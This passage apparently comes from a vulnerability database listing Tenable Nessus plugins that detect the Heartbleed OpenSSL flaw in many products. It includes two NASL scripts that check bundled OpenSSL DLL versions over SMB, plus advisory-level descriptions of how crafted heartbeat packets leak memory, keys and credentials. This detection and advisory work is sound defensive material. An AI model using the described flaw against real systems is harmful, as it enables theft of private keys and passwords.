      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?35854217");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      script_set_attribute(attribute:"solution", value:
    "Refer to the vendor advisory and apply the necessary patch.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/04/29");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:websense:websense_email_security");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("websense_email_security_installed.nasl");
      script_require_keys("SMB/Websense Email Security/Path");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_func.inc");
    include("smb_hotfixes.inc");
    include("smb_hotfixes_fcheck.inc");
    include("smb_reg_query.inc");
    include("misc_func.inc");
    
    function get_file_list(dir, pattern, max_depth)
    {
      local_var retx, file_list, dir_list, r_file_list, r_dir;
      if(max_depth < 0)
        return NULL;
    
      retx = FindFirstFile(pattern:dir + "\*");
      file_list = make_list();
      dir_list = make_list();
    
      while(!isnull(retx[1]))
      {
        if(retx[2] & FILE_ATTRIBUTE_DIRECTORY && retx[1] != '.' && retx[1] != '..')
          dir_list = make_list(dir_list, retx[1]);
        else
        {
          if(retx[1] =~ pattern)
            file_list = make_list(file_list, dir + "\" + retx[1]);
        }
        retx = FindNextFile(handle:retx);
      }
    
      foreach r_dir (dir_list)
      {
        r_file_list = get_file_list(dir:dir + "\" + r_dir, pattern: pattern, max_depth: max_depth - 1);
        if(r_file_list != NULL)
          file_list = make_list(file_list, r_file_list);
      }
    
      return file_list;
    }
    
    path = get_kb_item_or_exit('SMB/Websense Email Security/Path');
    version = get_kb_item_or_exit('SMB/Websense Email Security/Version');
    
    # Per vendor :
    # Any build number greater than 7.3.1181 is vuln
    # No need to check earlier versions for the DLL
    if (ver_compare(ver:version, fix:"7.3.1181", strict:FALSE) < 0)
      audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path);
    
    name    =  kb_smb_name();
    port    =  kb_smb_transport();
    login   =  kb_smb_login();
    pass    =  kb_smb_password();
    domain  =  kb_smb_domain();
    
    registry_init();
    
    share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
    rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);
    if (rc != 1)
    {
      NetUseDel();
      audit(AUDIT_SHARE_FAIL, share);
    }
    
    # Find OpenSSL DLLs under main install path
    search_dir = ereg_replace(pattern:'[A-Za-z]:(.*)', replace:'\\1', string:path);
    dlls = get_file_list(dir:search_dir, pattern:"^(libeay32|ssleay32)\.dll$", max_depth:3);
    info = "";
    foreach dll (dlls)
    {
      temp_path = (share - '$')+ ":" + dll;
      dll_ver = hotfix_get_pversion(path:temp_path);
      err_res = hotfix_handle_error(
        error_code   : dll_ver['error'],
        file         : temp_path,
        appname      : 'Websense Email Security',
        exit_on_fail : FALSE
      );
      if (err_res) continue;
    
      dll_version = join(dll_ver['value'], sep:".");
    
      if (dll_version =~ "^1\.0\.1[a-f]$")
        info +=
          '\n  Path              : ' + temp_path +
          '\n  Installed version : ' + dll_version +
          '\n  Fixed version     : 1.0.1g\n';
    }
    hotfix_check_fversion_end();
    
    if (info)
    {
      if (report_verbosity > 0) security_warning(port:port, extra:info);
      else security_warning(port);
    }
    else audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path);
    
  • NASL familyWindows
    NASL idHP_LOADRUNNER_12_00_1.NASL
    descriptionThe version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77054
    published2014-08-07
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77054
    titleHP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(77054);
      script_version("1.14");
      script_cvs_date("Date: 2019/11/25");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
      script_xref(name:"HP", value:"HPSBMU03040");
      script_xref(name:"HP", value:"SSRT101565");
    
      script_name(english:"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks the version of HP LoadRunner.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Windows host has an application that is affected by an
    information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of HP LoadRunner installed on the remote host is 11.52.x
    prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,
    therefore, affected by an out-of-bounds read error, known as the
    'Heartbleed Bug' in the included OpenSSL version.
    
    This error is related to handling TLS heartbeat extensions that could
    allow an attacker to obtain sensitive information such as primary key
    material, secondary key material, and other protected content.");
      # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c3b43466");
      script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/532104/30/0/threaded");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/05/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/07");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("hp_loadrunner_installed.nasl");
      script_require_keys("SMB/Registry/Enumerated", "installed_sw/HP LoadRunner");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    include('audit.inc');
    include('smb_func.inc');
    include('smb_hotfixes.inc');
    include('smb_hotfixes_fcheck.inc');
    include('smb_reg_query.inc');
    include('misc_func.inc');
    include("install_func.inc");
    
    app_name = "HP LoadRunner";
    cutoff  = NULL;
    cutoff2 = NULL;
    fixed   = NULL;
    report  = NULL;
    
    # Only 1 install of the server is possible.
    install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
    
    version = install['version'];
    path = install['path'];
    verui = install['display_version'];
    
    # Determine cutoff if affected branch.
    # 11.52.0 is 11.52.1323.0 or 11.52.1517.0
    # 12.00.0 is 12.00.661.0
    if (version =~ "^11\.52($|[^0-9])")
    {
      cutoff  = "11.52.1323.0";
      cutoff2 = "11.52.1517.0";
    }
    if (version =~ "^12\.00?($|[^0-9])")
    {
      cutoff = "12.0.661.0";
      cutoff2 = "12.0.661.0";
    }
    
    if (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + " 11.52.x / 12.0.x");
    
    if (version >= cutoff && version <= cutoff2)
    {
      foreach file (make_list("ssleay32_101_x32.dll", "ssleay32_101_x64.dll"))
      {
        dll_path = path + "bin\" + file;
        res = hotfix_get_fversion(path:dll_path);
        err_res = hotfix_handle_error(
          error_code   : res['error'],
          file         : dll_path,
          appname      : app_name,
          exit_on_fail : FALSE
        );
        if (err_res) continue;
    
        dll_ver = join(sep:'.', res['value']);
        break;
      }
      hotfix_check_fversion_end();
    
      if (empty_or_null(dll_ver))
        audit(
          AUDIT_VER_FAIL,
          "ssleay32_101_x32.dll and ssleay32_101_x64.dll under " + path + "bin\"
        );
    
      fixed_dll_ver = '1.0.1.4';
      if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)
        report =
          '\n  Path                  : ' + dll_path +
          '\n  Installed DLL version : ' + dll_ver  +
          '\n  Fixed DLL version     : ' + fixed_dll_ver +
          '\n';
    }
    # If not at a patchable version, use ver_compare() and suggest
    # upgrade if needed; do not use cutoff2 - this will lead to
    # false positives.
    else if (
      (
        cutoff =~ "^11\." &&
        ver_compare(ver:"11.52", fix:version, strict:FALSE) >= 0 &&
        ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1
      )
      ||
      (
        cutoff =~ "^12\." &&
        ver_compare(ver:"12.00", fix:version, strict:FALSE) >= 0 &&
        ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1
      )
    )
    {
      report =
        '\n  Path              : ' + path +
        '\n  Installed version : ' + version +
        '\n  Fixed version     : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +
        '\n';
    }
    
    if (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);
    
    port = kb_smb_transport();
    
    if (report_verbosity > 0) security_warning(extra:report, port:port);
    else security_warning(port);
    
  • NASL familyMisc.
    NASL idVMWARE_VMSA-2014-0004_REMOTE.NASL
    descriptionThe remote VMware ESXi host is affected by multiple vulnerabilities in the OpenSSL third-party library : - A flaw exist in the Elliptic Curve Digital Signature Algorithm (ECDSA) implementation due to a failure to insure that certain swap operations have a constant-time behavior. An attacker can exploit this to obtain the ECDSA nonces by using a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. (CVE-2014-0160)
    last seen2020-06-01
    modified2020-06-02
    plugin id87676
    published2015-12-30
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/87676
    titleVMware ESXi Multiple OpenSSL Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20140408_OPENSSL_ON_SL6_X.NASL
    descriptionAn information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73408
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73408
    titleScientific Linux Security Update : openssl on SL6.x i386/x86_64
  • NASL familyWindows
    NASL idSMB_KB2962393.NASL
    descriptionThe remote host is missing KB2962393, which resolves an OpenSSL information disclosure vulnerability (Heartbleed) in the Juniper VPN client software shipped with Windows 8.1.
    last seen2020-06-01
    modified2020-06-02
    plugin id73865
    published2014-05-05
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73865
    titleMS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4910.NASL
    descriptionpull in upstream patch for CVE-2014-0160
    last seen2020-03-17
    modified2014-04-09
    plugin id73430
    published2014-04-09
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73430
    titleFedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)
  • NASL familyWindows
    NASL idHP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL
    descriptionAccording to its version, the HP Insight Control Server Migration install on the remote Windows host includes a bundled copy of OpenSSL that is affected by an information disclosure vulnerability. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen2020-06-01
    modified2020-06-02
    plugin id76463
    published2014-07-10
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76463
    titleHP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idVMWARE_WORKSTATION_MULTIPLE_VMSA_2014_0004.NASL
    descriptionThe version of VMware Workstation installed on the remote host is version 10.x prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73674
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73674
    titleVMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyMacOS X Local Security Checks
    NASL idMACOSX_LIBREOFFICE_423.NASL
    descriptionA version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Mac OS X host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function
    last seen2020-06-01
    modified2020-06-02
    plugin id76511
    published2014-07-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76511
    titleLibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Mac OS X) (Heartbleed)
  • NASL familyMisc.
    NASL idFORTINET_FG-IR-14-011.NASL
    descriptionThe firmware of the remote Fortinet host is running a version of OpenSSL that is affected by a remote information disclosure, commonly known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73669
    published2014-04-11
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73669
    titleFortinet OpenSSL Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idSTUNNEL_5_01.NASL
    descriptionThe version of stunnel installed on the remote host is prior to version 5.01. It is, therefore, affected by an information disclosure vulnerability in the bundled OpenSSL DLLs. A remote attacker can read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id73500
    published2014-04-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73500
    titlestunnel < 5.01 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0376.NASL
    descriptionUpdated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73396
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73396
    titleRHEL 6 : openssl (RHSA-2014:0376)
  • NASL familyWindows
    NASL idATTACHMATE_REFLECTION_HEARTBLEED.NASL
    descriptionThe Attachmate Reflection install on the remote host is affected by an out-of-bounds read error known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id76309
    published2014-06-30
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76309
    titleAttachmate Reflection Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFirewalls
    NASL idMCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL
    descriptionThe remote host has a version of McAfee Firewall Enterprise installed that is affected by an out-of-bounds read error, known as Heartbleed, in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content.
    last seen2020-06-01
    modified2020-06-02
    plugin id73834
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73834
    titleMcAfee Firewall Enterprise OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2014-277.NASL
    descriptionThis openssl update fixes one security issue : - bnc#872299: Fixed missing bounds checks for heartbeat messages (CVE-2014-0160).
    last seen2020-06-05
    modified2014-06-13
    plugin id75314
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75314
    titleopenSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)
  • NASL familyWindows
    NASL idFILEZILLA_SERVER_0944.NASL
    descriptionAccording to its banner, the version of FileZilla Server running on the remote host is prior to 0.9.44. It is, therefore, affected by an information disclosure vulnerability. An information disclosure flaw exists with the OpenSSL included with FileZilla Server. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id73640
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73640
    titleFileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyMacOS X Local Security Checks
    NASL idMACOSX_FUSION_6_0_3.NASL
    descriptionThe version of VMware Fusion 6.x installed on the remote Mac OS X host is prior to 6.0.3. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73670
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73670
    titleVMware Fusion 6.x < 6.0.3 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyWindows
    NASL idSYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL
    descriptionAccording to its self-reported version number, the version of Symantec Endpoint Protection Manager (SEPM) installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73964
    published2014-05-12
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73964
    titleSymantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWeb Servers
    NASL idHP_OFFICEJET_PRO_HEARTBLEED.NASL
    descriptionAccording to its self-reported build information, the firmware running on the remote HP OfficeJet printer is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74270
    published2014-06-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74270
    titleHP OfficeJet Printer Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-9308.NASL
    descriptionMultiple moderate issues fixed. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-08-10
    plugin id77108
    published2014-08-10
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77108
    titleFedora 20 : openssl-1.0.1e-39.fc20 (2014-9308) (Heartbleed)
  • NASL familyVMware ESX Local Security Checks
    NASL idVMWARE_VMSA-2014-0004.NASL
    descriptiona. Information Disclosure vulnerability in OpenSSL third-party library The OpenSSL library is updated to version openssl-1.0.1g to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0076 and CVE-2014-0160 to these issues. CVE-2014-0160 is known as the Heartbleed issue. More information on this issue may be found in the reference section. To remediate the issue for products that have updated versions or patches available, perform these steps: * Deploy the VMware product update or product patches * Replace certificates per the product-specific documentation * Reset passwords per the product-specific documentation Section 4 lists product-specific references to installation instructions and certificate management documentation.
    last seen2020-06-01
    modified2020-06-02
    plugin id73851
    published2014-05-03
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73851
    titleVMSA-2014-0004 : VMware product updates address OpenSSL security vulnerabilities
  • NASL familyWeb Servers
    NASL idHPSMH_7_3_2.NASL
    descriptionAccording to the web server
    last seen2020-06-01
    modified2020-06-02
    plugin id73639
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73639
    titleHP System Management Homepage OpenSSL Multiple Vulnerabilities (Heartbleed)
  • NASL familySlackware Local Security Checks
    NASL idSLACKWARE_SSA_2014-098-01.NASL
    descriptionNew openssl packages are available for Slackware 14.0, 14.1, and -current to fix security issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id73409
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73409
    titleSlackware 14.0 / 14.1 / current : openssl (SSA:2014-098-01)
  • NASL familyF5 Networks Local Security Checks
    NASL idF5_BIGIP_SOL15159.NASL
    descriptionThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160) Impact A malicious user can exploit vulnerable systems and retrieve information from memory. This information may potentially include user credentials or the private keys used for Transport Layer Security (TLS) or Datagram Transport Layer Security (DTLS). For information about vulnerable components or features, refer to the following list : Virtual servers using aSecure Sockets Layer (SSL) profile configured with the default Native SSL ciphers are not vulnerable. Only virtual servers using an SSL profile configured to use ciphers from the COMPAT SSL stack are vulnerable in BIG-IP 11.5.0 and 11.5.1. Additionally, virtual servers that do not use SSL profiles and pass SSL traffic to the back-end web servers will not protect the back-end resource servers. The Configuration utility and other services, such as iControl, are vulnerable. The big3d process included with BIG-IP GTM 11.5.0 and 11.5.1 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected BIG-IP GTM system are also vulnerable. The big3d process included with Enterprise Manager 3.1.1 HF1 and HF2 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected Enterprise Manager system are also vulnerable. The BIG-IP Edge Client for Android is not vulnerable. However, the BIG-IP Edge Client for Windows, Mac OS, and Linux is vulnerable. An attacker can retrieve sensitive information by using the stated vulnerability in the following scenarios: User is tricked into connecting to any malicious SSL server. User connects to a compromised FirePass or BIG-IP APM system.
    last seen2020-06-01
    modified2020-06-02
    plugin id78164
    published2014-10-10
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/78164
    titleF5 Networks BIG-IP : OpenSSL vulnerability (K15159) (Heartbleed)
  • NASL familyAIX Local Security Checks
    NASL idAIX_OPENSSL_ADVISORY7.NASL
    descriptionThe version of OpenSSL running on the remote host is affected by an information disclosure vulnerability. OpenSSL incorrectly handles memory in the TLS heartbeat extension, potentially allowing a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen2020-06-01
    modified2020-06-02
    plugin id73472
    published2014-04-11
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73472
    titleAIX OpenSSL Advisory : openssl_advisory7.doc (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_EMAIL_GATEWAY_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Email Gateway (MEG) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73832
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73832
    titleMcAfee Email Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWeb Servers
    NASL idSPLUNK_603.NASL
    descriptionAccording to its version number, the Splunk Web hosted on the remote web server is 6.x prior to 6.0.3. It is, therefore, affected by multiple OpenSSL-related vulnerabilities : - A flaw exists with the OpenSSL version being used by Splunk with the
    last seen2020-06-01
    modified2020-06-02
    plugin id73575
    published2014-04-16
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73575
    titleSplunk 6.x < 6.0.3 Multiple OpenSSL Vulnerabilities (Heartbleed)
  • NASL familyWindows
    NASL idWINSCP_5_5_3.NASL
    descriptionThe WinSCP program installed on the remote host is version 4.x later than 4.3.7, 5.x later than 5.0.6 and prior to 5.5.3. It is, therefore, affected by the following vulnerabilities : - An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73613
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73613
    titleWinSCP Heartbeat Information Disclosure (Heartbleed)
  • NASL familyGeneral
    NASL idVMWARE_WORKSTATION_LINUX_10_0_2.NASL
    descriptionThe installed version of VMware Workstation 10.x is prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73673
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73673
    titleVMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed)
  • NASL familyWindows
    NASL idBLACKBERRY_ES_UDS_KB35882.NASL
    descriptionThe BlackBerry Enterprise Service (BES) install on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73762
    published2014-04-29
